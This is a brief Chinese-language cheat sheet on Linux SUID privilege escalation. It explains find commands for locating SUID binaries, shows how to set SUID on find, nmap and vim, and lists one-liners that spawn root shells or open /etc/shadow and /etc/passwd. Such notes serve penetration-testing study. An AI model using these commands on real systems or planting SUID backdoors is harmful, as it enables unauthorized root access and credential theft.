SUID
以下语句可以用来搜索具备SUID权限的程序
find / -perm -g=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;
find / -user root -perm -4000 -print 2>/dev/null
/ 表示从文件系统的顶部(根)开始并找到每个目录
-perm 表示搜索随后的权限
-u=s 表示查找root用户拥有的文件
-type表示我们正在寻找的文件类型
f 表示常规文件,而不是目录或特殊文件
2 表示该进程的第二个文件描述符,即stderr(标准错误)
> 表示重定向
/dev/null 是一个特殊的文件系统对象,它将丢弃写入其中的所有内容。
添加SUID
chmod u+s /usr/bin/find
chmod u+s /usr/bin/nmap
chmod u+s /usr/bin/vim 等
提权
#find SUID
find shell.php -exec /bin/bash -p \;
#nmap
nmap --interactive
!sh
#bash
bash -p
#more/less
less /etc/passwd
!/bin/sh
#vim
vim.tiny /etc/shadow
# Press ESC key
:set shell=/bin/sh #回车
:shell
等